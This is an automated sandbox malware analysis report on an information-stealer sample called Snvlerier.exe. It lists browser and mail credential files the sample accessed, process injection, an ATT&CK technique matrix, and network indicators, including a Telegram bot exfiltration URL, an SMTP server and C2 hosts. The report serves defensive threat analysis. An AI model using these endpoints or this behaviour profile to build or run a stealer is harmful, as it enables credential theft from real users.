            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_00405D0F GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D0F

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7824, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: 00000006.00000002.3066949084.0000000021608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7824, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7824, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            2
            Obfuscated Files or Information
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts311
            Process Injection
            1
            Software Packing
            LSASS Memory14
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            PowerShell
            Logon Script (Windows)Logon Script (Windows)1
            DLL Side-Loading
            Security Account Manager211
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            1
            Non-Standard Port
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script131
            Virtualization/Sandbox Evasion
            LSA Secrets131
            Virtualization/Sandbox Evasion
            SSHKeylogging3
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
            Process Injection
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input Capture24
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532989 Sample: Snvlerier.exe Startdate: 14/10/2024 Architecture: WINDOWS Score: 100 36 reallyfreegeoip.org 2->36 38 api.telegram.org 2->38 40 5 other IPs or domains 2->40 48 Multi AV Scanner detection for domain / URL 2->48 50 Found malware configuration 2->50 52 Multi AV Scanner detection for dropped file 2->52 58 6 other signatures 2->58 8 Snvlerier.exe 18 2->8         started        signatures3 54 Tries to detect the country of the analysis system (by using the IP) 36->54 56 Uses the Telegram API (likely for C&C communication) 38->56 process4 file5 22 C:\Users\user\AppData\Local\...\nsm2DDB.tmp, DOS 8->22 dropped 24 C:\Users\user\AppData\Local\...ftermles.Tra, ASCII 8->24 dropped 60 Suspicious powershell command line found 8->60 12 powershell.exe 28 8->12         started        signatures6 process7 file8 26 C:\Users\user\AppData\Local\...\Snvlerier.exe, PE32 12->26 dropped 28 C:\Users\...\Snvlerier.exe:Zone.Identifier, ASCII 12->28 dropped 62 Early bird code injection technique detected 12->62 64 Writes to foreign memory regions 12->64 66 Found suspicious powershell code related to unpacking or dynamic code loading 12->66 68 3 other signatures 12->68 16 msiexec.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 30 api.telegram.org 149.154.167.220, 443, 49827 TELEGRAMRU United Kingdom 16->30 32 smtp.ionos.es 213.165.67.118, 49873, 587 ONEANDONE-ASBrauerstrasse48DE Germany 16->32 34 4 other IPs or domains 16->34 42 Tries to steal Mail credentials (via file / registry access) 16->42 44 Tries to harvest and steal browser information (history, passwords, etc) 16->44 46 Hides threads from debuggers 16->46 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Snvlerier.exe8%ReversingLabs
            Snvlerier.exe27%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Snvlerier.exe8%ReversingLabs
            C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Snvlerier.exe27%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\nsm2DDB.tmp0%VirustotalBrowse
            No Antivirus matches
            SourceDetectionScannerLabelLink
            drive.google.com0%VirustotalBrowse
            drive.usercontent.google.com1%VirustotalBrowse
            reallyfreegeoip.org0%VirustotalBrowse
            smtp.ionos.es1%VirustotalBrowse
            api.telegram.org2%VirustotalBrowse
            checkip.dyndns.com0%VirustotalBrowse
            checkip.dyndns.org0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
            https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
            http://crl.micro0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            https://apis.google.com0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            https://www.office.com/0%VirustotalBrowse
            http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
            https://api.telegram.org/bot4%VirustotalBrowse
            https://api.telegram.org1%VirustotalBrowse
            http://smtp.ionos.es1%VirustotalBrowse
            https://www.office.com/lB0%VirustotalBrowse
            https://www.office.com/H0%VirustotalBrowse
            https://drive.usercontent.google.com/0%VirustotalBrowse
            https://api.telegram.org/bot/sendMessage?chat_id=&text=2%VirustotalBrowse
            https://github.com/Pester/Pester1%VirustotalBrowse
            https://chrome.google.com/webstore?hl=en0%VirustotalBrowse
            http://varders.kozow.com:808115%VirustotalBrowse
            https://www.google.com0%VirustotalBrowse
            http://aborters.duckdns.org:808114%VirustotalBrowse
            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20a1%VirustotalBrowse
            http://anotherarmy.dns.army:808118%VirustotalBrowse
            http://51.38.247.67:8081/_send_.php?L7%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.185.110
            truefalseunknown
            drive.usercontent.google.com
            142.250.185.97
            truefalseunknown
            reallyfreegeoip.org
            188.114.96.3
            truetrueunknown
            smtp.ionos.es
            213.165.67.118
            truetrueunknown
            api.telegram.org
            149.154.167.220
            truetrueunknown
            checkip.dyndns.com
            193.122.130.0
            truefalseunknown
            checkip.dyndns.org
            unknown
            unknowntrueunknown
            NameMaliciousAntivirus DetectionReputation
            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2014/10/2024%20/%2014:08:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
              unknown
              https://reallyfreegeoip.org/xml/8.46.123.33false
              • URL Reputation: safe
              unknown
              http://checkip.dyndns.org/false
              • URL Reputation: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://www.office.com/msiexec.exe, 00000006.00000002.3066949084.00000000216F2000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2188765329.00000000056FB000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.telegram.orgmsiexec.exe, 00000006.00000002.3066949084.00000000215E5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2185474928.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.telegram.org/botmsiexec.exe, 00000006.00000002.3066949084.00000000215E5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2185474928.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://drive.usercontent.google.com/Fpmsiexec.exe, 00000006.00000003.2259064820.00000000057DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2259151965.0000000005814000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://contoso.com/Licensepowershell.exe, 00000001.00000002.2188765329.00000000056FB000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.office.com/lBmsiexec.exe, 00000006.00000002.3066949084.00000000216ED000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://contoso.com/Iconpowershell.exe, 00000001.00000002.2188765329.00000000056FB000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://drive.usercontent.google.com/Aqmsiexec.exe, 00000006.00000002.3053737496.00000000057C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2259064820.00000000057DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2259151965.0000000005814000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://www.office.com/Hmsiexec.exe, 00000006.00000002.3066949084.00000000216E3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://drive.usercontent.google.com/msiexec.exe, 00000006.00000002.3053737496.00000000057C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2259064820.00000000057DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2259151965.0000000005814000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://checkip.dyndns.orgmsiexec.exe, 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016msiexec.exe, 00000006.00000002.3069099861.0000000022651000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.0000000022780000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021608000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000227CE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000225DC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.000000002262A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000228A4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://nsis.sf.net/NSIS_ErrorErrorSnvlerier.exe, Snvlerier.exe.1.drfalse
                  • URL Reputation: safe
                  unknown
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17msiexec.exe, 00000006.00000002.3069099861.0000000022651000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.0000000022780000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021608000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000227CE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000225DC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.000000002262A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000228A4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://smtp.ionos.esmsiexec.exe, 00000006.00000002.3066949084.0000000021608000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000006.00000002.3066949084.00000000215E5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20amsiexec.exe, 00000006.00000002.3066949084.00000000215E5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000006.00000002.3066949084.00000000216C1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021608000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.00000000216F2000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  http://varders.kozow.com:8081msiexec.exe, 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2185474928.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://www.ionos.com/help/index.php?id=2425&ip=8.46.123.33&c=hd&r=1MPXMa-1tMkBm3Mnq-00Nj5bmsiexec.exe, 00000006.00000002.3066949084.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021693000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.00000000216A0000.00000004.00000800.00020000.00000000.sdmpfalse
                    unknown
                    http://aborters.duckdns.org:8081msiexec.exe, 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://www.google.commsiexec.exe, 00000006.00000003.2225341752.000000000581A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    http://nsis.sf.net/NSIS_ErrorSnvlerier.exe, Snvlerier.exe.1.drfalse
                    • URL Reputation: safe
                    unknown
                    http://51.38.247.67:8081/_send_.php?Lmsiexec.exe, 00000006.00000002.3066949084.0000000021608000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    http://crl.micropowershell.exe, 00000001.00000002.2191636032.0000000006D66000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2185474928.0000000004691000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33$msiexec.exe, 00000006.00000002.3066949084.00000000215BE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.00000000215E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021579000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://anotherarmy.dns.army:8081msiexec.exe, 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installmsiexec.exe, 00000006.00000002.3069099861.000000002262D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000225B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.000000002275C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.000000002287F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.0000000022787000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000225E3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://drive.google.com/HLmsiexec.exe, 00000006.00000002.3053737496.000000000576A000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://contoso.com/powershell.exe, 00000001.00000002.2188765329.00000000056FB000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2188765329.00000000056FB000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000006.00000002.3066949084.00000000216BC000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        https://reallyfreegeoip.orgmsiexec.exe, 00000006.00000002.3066949084.00000000215BE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.00000000215E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.000000002154F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://apis.google.commsiexec.exe, 00000006.00000003.2225341752.000000000581A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesmsiexec.exe, 00000006.00000002.3069099861.000000002262D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000225B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.000000002275C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.000000002287F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.0000000022787000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000225E3000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2185474928.0000000004691000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021501000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://drive.google.com/XLmsiexec.exe, 00000006.00000002.3053737496.000000000576A000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://reallyfreegeoip.org/xml/msiexec.exe, 00000006.00000002.3066949084.000000002154F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          api.telegram.orgUnited Kingdom
                          62041TELEGRAMRUtrue
                          188.114.96.3
                          reallyfreegeoip.orgEuropean Union
                          13335CLOUDFLARENETUStrue
                          193.122.130.0
                          checkip.dyndns.comUnited States
                          31898ORACLE-BMC-31898USfalse
                          142.250.185.110
                          drive.google.comUnited States
                          15169GOOGLEUSfalse
                          213.165.67.118
                          smtp.ionos.esGermany
                          8560ONEANDONE-ASBrauerstrasse48DEtrue
                          142.250.185.97
                          drive.usercontent.google.comUnited States
                          15169GOOGLEUSfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1532989
                          Start date and time:2024-10-14 09:10:20 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 22s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Snvlerier.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@6/14@6/6
                          EGA Information:
                          • Successful, ratio: 33.3%
                          HCA Information:
                          • Successful, ratio: 96%
                          • Number of executed functions: 148
                          • Number of non-executed functions: 74
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target msiexec.exe, PID 7824 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7300 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          TimeTypeDescription
                          03:11:23API Interceptor34x Sleep call for process: powershell.exe modified
                          03:12:11API Interceptor109585x Sleep call for process: msiexec.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220SecuriteInfo.com.Win32.Evo-gen.25810.23454.exeGet hashmaliciousXWormBrowse
                            SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exeGet hashmaliciousXWormBrowse
                              mIURiU8n2P.exeGet hashmaliciousXWormBrowse
                                8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                  sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                    1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292Get hashmaliciousUnknownBrowse
                                          SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                                            188.114.96.3DRAFT DOC2406656.bat.exeGet hashmaliciousLokibotBrowse
                                            • touxzw.ir/sirr/five/fre.php
                                            lv961v43L3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            • 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
                                            10092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                                            • www.airgame.store/ojib/
                                            Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                            • www.cc101.pro/59fb/
                                            octux.exe.exeGet hashmaliciousUnknownBrowse
                                            • servicetelemetryserver.shop/api/index.php
                                            bX8NyyjOFz.exeGet hashmaliciousFormBookBrowse
                                            • www.rtprajalojago.live/2uvi/
                                            lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                            • www.serverplay.live/71nl/
                                            sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                            • www.cc101.pro/0r21/
                                            E_receipt.vbsGet hashmaliciousUnknownBrowse
                                            • paste.ee/d/VO2TX
                                            QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • filetransfer.io/data-package/fOmsJ2bL/download
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            smtp.ionos.esContrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 213.165.67.118
                                            r8x1WvSkbWSUjXh6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 213.165.67.102
                                            ZcH50SI4q45Dtpf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 213.165.67.118
                                            LisectAVT_2403002A_257.exeGet hashmaliciousAgentTeslaBrowse
                                            • 213.165.67.102
                                            USyhqVZT33vX26Y.exeGet hashmaliciousAgentTeslaBrowse
                                            • 213.165.67.118
                                            60yQVZ67vj.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 213.165.67.102
                                            JUSTIFICANTE PAGO FACTURA.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 213.165.67.118
                                            Nowe zam#U00f3wienie nr 201030019.exeGet hashmaliciousAgentTeslaBrowse
                                            • 213.165.67.102
                                            pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 213.165.67.118
                                            reallyfreegeoip.orgrPayment_slip.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            Quotation-GINC-19-00204.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 188.114.97.3
                                            New order PO#001498.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                            • 188.114.96.3
                                            PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            _GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
